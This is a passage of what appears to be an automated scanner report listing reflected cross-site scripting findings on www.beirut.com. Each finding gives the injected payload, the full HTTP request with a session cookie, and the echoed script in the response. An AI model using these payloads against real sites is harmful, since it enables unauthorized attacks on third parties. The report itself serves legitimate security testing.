Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingabd55"><a>64eb7a78900">
...[SNIP]...

4.1058. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5ffd'-alert(1)-'c7888ff4bbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Shopping-Centersa5ffd'-alert(1)-'c7888ff4bbb/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:52:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Shopping-Centersa5ffd'-alert(1)-'c7888ff4bbb/492064852/Commercial-Centers/12';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1059. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 346f3<script>alert(1)</script>17b8174ebbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Shopping-Centers346f3<script>alert(1)</script>17b8174ebbc/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:52:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Shopping Centers346f3<script>alert(1)</script>17b8174ebbc <a href="#" id="backlink">
...[SNIP]...

4.1060. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b47'-alert(1)-'290b845ce07 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Shopping-Centers/49206485213b47'-alert(1)-'290b845ce07/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:57:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Shopping-Centers/49206485213b47'-alert(1)-'290b845ce07/Commercial-Centers/12';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1061. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8541e'-alert(1)-'ca4337fdb27 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Shopping-Centers/492064852/Commercial-Centers8541e'-alert(1)-'ca4337fdb27/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:01:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Shopping-Centers/492064852/Commercial-Centers8541e'-alert(1)-'ca4337fdb27/12';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1062. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a81fa'-alert(1)-'2d7ae7ee7d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinga81fa'-alert(1)-'2d7ae7ee7d9/Shopping-Centers/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:41:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppinga81fa'-alert(1)-'2d7ae7ee7d9/Shopping-Centers/492064852/Shopping-Malls/10';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1063. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89686"><a>ae9d922780c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping89686"><a>ae9d922780c/Shopping-Centers/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping89686"><a>ae9d922780c">
...[SNIP]...

4.1064. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9882<script>alert(1)</script>ebae0710a1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Shopping-Centersc9882<script>alert(1)</script>ebae0710a1b/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Shopping Centersc9882<script>alert(1)</script>ebae0710a1b <a href="#" id="backlink">
...[SNIP]...

4.1065. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f82d5'-alert(1)-'8ad41671a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Shopping-Centersf82d5'-alert(1)-'8ad41671a0/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:47:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Shopping-Centersf82d5'-alert(1)-'8ad41671a0/492064852/Shopping-Malls/10';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1066. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82d57'-alert(1)-'dfc3e1d1619 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Shopping-Centers/49206485282d57'-alert(1)-'dfc3e1d1619/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:50:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Shopping-Centers/49206485282d57'-alert(1)-'dfc3e1d1619/Shopping-Malls/10';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1067. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be4f0'-alert(1)-'4a3dd680759 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Shopping-Centers/492064852/Shopping-Mallsbe4f0'-alert(1)-'4a3dd680759/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:57:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Shopping-Centers/492064852/Shopping-Mallsbe4f0'-alert(1)-'4a3dd680759/10';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1068. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91d91'-alert(1)-'24cd2b8df34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Shopping-Centers/492064852/Shopping-Malls/1091d91'-alert(1)-'24cd2b8df34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:01:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Shopping-Centers/492064852/Shopping-Malls/1091d91'-alert(1)-'24cd2b8df34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1069. http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Specialized-Stores/2572668008

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c548'-alert(1)-'fff390e69db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping8c548'-alert(1)-'fff390e69db/Specialized-Stores/2572668008 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:50:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping8c548'-alert(1)-'fff390e69db/Specialized-Stores';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1070. http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Specialized-Stores/2572668008

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd5fb"><a>190ff575f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingcd5fb"><a>190ff575f9d/Specialized-Stores/2572668008 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:43:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingcd5fb"><a>190ff575f9d">
...[SNIP]...

4.1071. http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 2] previous next

Summary

Severity:	High
